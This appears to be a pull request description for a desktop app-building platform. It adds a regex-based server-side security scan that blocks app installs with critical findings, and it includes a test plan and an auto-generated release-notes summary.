App Studio's Build/Publish views are currently a frontend-only mock (no persisted generated-file pipeline yet -- Build streams an agent chat transcript, it doesn't produce saved files). The one real, already-existing persistence/publish mechanism for any app (including a future App-Studio-produced one) is `POST /api/userspace-apps/install`, so the server-side gate is wired there -- this is the actual route that cannot be bypassed by the client, matching the task's "must run server-side" requirement. `PublishView` calls the new `/analyze` endpoint against a placeholder demo source (documented in-line) until the real generated-file pipeline lands; the wiring and backend gate are fully real and exercised end to end.

Detection is line-anchored regex, not a full AST parse -- this avoids adding a Node.js subprocess dependency to a security module's request path (a poor fit for taOS's "install must just work" story on constrained hardware). The tradeoff and each detector's blind spots are documented in `code_analyzer.py`'s module docstring and per-detector docstrings.

## Test plan
- [x] `pytest tests/test_code_analyzer.py` -- 33 tests, one positive + one negative sample per detector plus aggregation tests
- [x] `pytest tests/test_routes_userspace_apps.py` -- 44 tests (38 existing + 6 new), including install-blocked-on-critical, blocked-app-not-persisted, clean-app-still-installs, and the new `/analyze` endpoint
- [x] `cd desktop && npm run build` -- succeeds
- [x] `cd desktop && npx vitest run` -- 279 files / 2326 tests pass, including new FindingsPanel and PublishView wiring tests
- [x] `python scripts/check_doc_gate.py diff-gate --base origin/dev` -- clean (Docs-Reviewed trailer on the frontend commit)

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

* **New Features**
  * Added a security scan preview in the app publishing flow, showing scan status and findings before publishing.
  * Added a new analysis endpoint for checking app source for security issues.

* **Bug Fixes**
  * Publishing is now blocked when critical security issues are detected.
  * App installs that fail security checks are rejected and no longer leave partial artifacts behind.
  * Improved error handling for scan failures and invalid analysis requests.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->